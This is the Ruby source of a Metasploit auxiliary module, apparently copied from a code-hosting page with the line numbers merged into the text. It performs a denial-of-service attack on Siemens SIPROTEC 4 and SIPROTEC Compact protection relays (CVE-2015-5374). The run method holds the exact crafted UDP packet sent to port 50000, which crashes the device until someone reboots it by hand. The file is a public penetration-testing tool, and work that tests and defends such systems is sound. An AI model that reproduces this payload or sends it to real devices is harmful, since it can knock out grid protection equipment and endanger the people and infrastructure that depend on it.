Path: blob/master/modules/auxiliary/dos/scada/siemens_siprotec4.rb
19721 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Udp7include Msf::Auxiliary::Dos89def initialize(_info = {})10super(11'Name' => 'Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service',12'Description' => %q{13This module sends a specially crafted packet to port 50000/UDP14causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) devices.15A manual reboot is required to return the device to service.16CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.17},18'Author' => [ 'M. Can Kurnaz' ],19'License' => MSF_LICENSE,20'References' => [21[ 'CVE', '2015-5374' ],22[ 'EDB', '44103' ],23[ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-15-202-01' ]24],25'Notes' => {26'Stability' => [CRASH_SERVICE_DOWN],27'SideEffects' => [],28'Reliability' => []29}30)3132register_options([Opt::RPORT(50000),])33end3435def run36connect_udp37pckt = "\x11\x49\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x9e"38print_status('Sending DoS packet...')39udp_sock.put(pckt)40disconnect_udp41end42end434445